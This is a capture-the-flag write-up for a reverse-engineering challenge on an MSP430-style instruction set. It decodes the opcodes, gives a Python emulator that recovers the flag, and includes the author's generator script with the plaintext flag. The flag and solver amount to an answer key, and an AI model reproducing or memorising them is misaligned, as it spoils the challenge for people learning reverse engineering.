here is some example instructions i pulled from the binary - i hope the pattern is immediately obvious, where the instr format is 0x5x with x being the number of the register in hexadecimal.
add:
1a 53 inc r10 ;
2b 53 incd r11 ;
2c 52 add #4, r12 ;r2 As==10
3d 52 add #8, r13 ;r2 As==11
so add1 and add2 actually get optimised into these inc and incd instructions, with the opcode being 53 instead of 52 for generic adds. the general format is this:
# inc
53 ------ 1a ------ (little endian)
0101 0011 0001 1010
|
0101 0011 -> opcode for inc
0001 -> corresponds to the increment amount. for inc, we sjut take this value as is
1010 -> register number in hex
#add
52 ------ 2c ------
0101 0010 0010 1100
0101 0011 -> opcode for add
0010 -> corresponds to the increment amount. we take this as an exponent to 2 before adding
1100 -> register number in hex
i hope that this is reasonable to understand. we can also exactly apply this to decd and sub, it’s the exact same idea:
15 83 dec r5 ;
26 83 decd r6 ;
27 82 sub #4, r7 ;r2 As==10
38 82 sub #8, r8 ;r2 As==11
we can see that it’s the exact same! just with 83 and 82 as opcodes instead.
honestly, armed with this, we’re literally already done and can write an emulator. let’s do that.
binary_bytes = open('rev.bin', 'rb').read()
regs = [0 for _ in range(0xf)]
opcodes = {
0x54: lambda reg, val: reg<<1, # rla
0x53: lambda reg, val: reg + val, # inc
0x52: lambda reg, val: reg + (2**val), # add
0x83: lambda reg, val: reg - val, # dec
0x82: lambda reg, val: reg - 2**val, # sub
0xe4: lambda reg, val: reg ^ reg # xor
}
prev_reg = 4
instructions = []
for idx in range(0, len(binary_bytes) - 1, 2):
word = binary_bytes[idx:idx+2].hex()
if word == '3e40':
instr_hex = binary_bytes[idx+2:idx+4].hex()
op, arg = binary_bytes[idx+3], binary_bytes[idx+2]
value, reg = (arg & 0b11110000) >> 4, (arg & 0b1111)
# gross patch
if 0x54 < op < 0x60: op = 0x54
if 0xe4 < op < 0xf0: op = 0xe4
if op in opcodes:
instructions.append((instr_hex, op, opcodes[op], value, reg))
prev_reg = 4
flag = b''
for i in instructions[::-1]: # we flip because of LIFO
instr_hex, op_num, op, value, reg = i
if op_num >= 0xe4:
flag_chunk = regs[prev_reg].to_bytes(2, byteorder='little')
flag += flag_chunk
regs[reg] = op(regs[reg], value)
prev_reg = reg
flag += regs[prev_reg].to_bytes(2, byteorder='little')
print(flag.decode(errors='ignore'))
so this will actually just print the flag but let’s go over some details that makes this work: the flag is calculated and stored as ascii bytes in the registers, and we iterate through registers 4 through 11 twice.
i didn’t want to encode multiple ops for the rla and xor so i just patch it into mapping to the same op. also we have to account for the order of the bytes.
to be honest it would be easier to parse the objdump output directly but this is more.. elucidatory i suppose. anyways yeah that’s basically it for the chal - just run that script and you get the answer.
for completeness sake here is the script i used to write the actual binary dynamically. i was going to do it manually but i figured it would be a cool exercise to actually ‘write’ my own assembler (for a limited amount of opcodes, that is)
flag = b"CyberBlitz2025{d3@th_4nd_t3x&s$}"
chunks = [flag[n:n+2] for n in range(0, len(flag), 2)]
func = lambda x: int.from_bytes(x, byteorder='little')
flag_chunks = [*map(func, chunks)]
from functools import lru_cache
CONSTS = [8, 4, 2, 1]
from collections import deque
CONSTS = [8, 4, 2, 1]
OPS = ['+', '-', '*']
def eval_op(a, op, b):
if op == '+': return a + b
if op == '-': return a - b
if op == '*': return a * b
raise ValueError(op)
def eval_left_to_right(expr):
"""Evaluate expression left-to-right without operator precedence"""
tokens = []
current = ''
# Tokenize the expression
for char in expr:
if char in '+-*':
if current:
tokens.append(int(current))
tokens.append(char)
current = ''
else:
tokens.append(char)
else:
current += char
if current:
tokens.append(int(current))
# Evaluate left-to-right
result = tokens[0]
for i in range(1, len(tokens), 2):
op = tokens[i]
next_val = tokens[i + 1]
if op == '+':
result += next_val
elif op == '-':
result -= next_val
elif op == '*':
result *= next_val
return result
def find_min_expr(n, limit=65535):
"""
BFS for minimal left-to-right expression using constants {8,4,2,1} and +,-,*
Returns expression string without parentheses.
"""
from collections import deque
q = deque()
visited = {}
# Start with single constants
for c in CONSTS:
expr = str(c)
q.append((c, expr, 0))
visited[c] = 0
if c == n:
return expr, 0
while q:
val, expr, ops = q.popleft()
if ops > 15: # Reasonable limit
continue
for c in CONSTS:
for op in OPS:
# For left-to-right evaluation, we can compute directly
if op == '+':
new_val = val + c
elif op == '-':
new_val = val - c
elif op == '*':
new_val = val * c
# Check bounds
if abs(new_val) > limit:
continue
new_ops = ops + 1
new_expr = expr + op + str(c)
# Verify the expression evaluates correctly left-to-right
if eval_left_to_right(new_expr) != new_val:
continue
# Check if we've seen this value with fewer ops
if new_val in visited and visited[new_val] <= new_ops:
continue
visited[new_val] = new_ops
if new_val == n:
return new_expr, new_ops
q.append((new_val, new_expr, new_ops))
return None, None
mappings = {
'+': 0x50,
'-': 0x80,
'*': 0x50
}
combine = lambda x, y: (x << 8) | y
def parse_into_asm(expr, reg):
bytecode = [combine(0xe0 | reg, reg)]
for i in range(0, len(expr), 2):
op, val = expr[i:i+2]
val = int(val)
if op == '+' or op == '-':
if op == '+': opcode = 0x50
else: opcode = 0x80
if val <= 2:
opcode = opcode | 0x3
argument = (val << 4) | (reg)
else:
opcode = opcode | 0x2
argument = (([1, 2, 4, 8].index(val)) << 4) | reg
bytecode.append(combine(opcode, argument))
if op == '*':
opcode = 0x50 | reg
instr = combine(opcode, reg)
for i in range([1, 2, 4, 8].index(val)):
bytecode.append(instr)
return [*map(hex, bytecode)]
boilerplate = [
'.section .reset, "a"',
' .word start',
'.text',
'start:',
'mov pc, R13',
'mov #0x2000, sp',
'mov sp, R15',
'mov.w #0x4d00, R14',
'push R14',
'mov.w #0x4303, R14',
'push R14'
]
actual_commands = []
for idx, i in enumerate(flag_chunks):
expr = '+' + find_min_expr(i)[0]
instrs = parse_into_asm(expr, (idx % 8) + 4)
print(expr, instrs)
for i in instrs:
actual_commands.append(f'mov.w #{i}, R14')
# fucking lifo!!!
for i in actual_commands[::-1]:
boilerplate.append(i)
boilerplate.append('push r14')
boilerplate.append('mov.w sp, pc')
import subprocess
with open('rev.S', 'w') as rev_output:
rev_output.write('\n'.join(boilerplate))
subprocess.run(['./build.sh', 'rev'])
you can literally see where the gpt slop starts and ends lol (bc i didnt want to write breadth-first-search to get minimal instructions given my self-imposed constraint on the limited instruction set i just didnt Feel Like Doing This)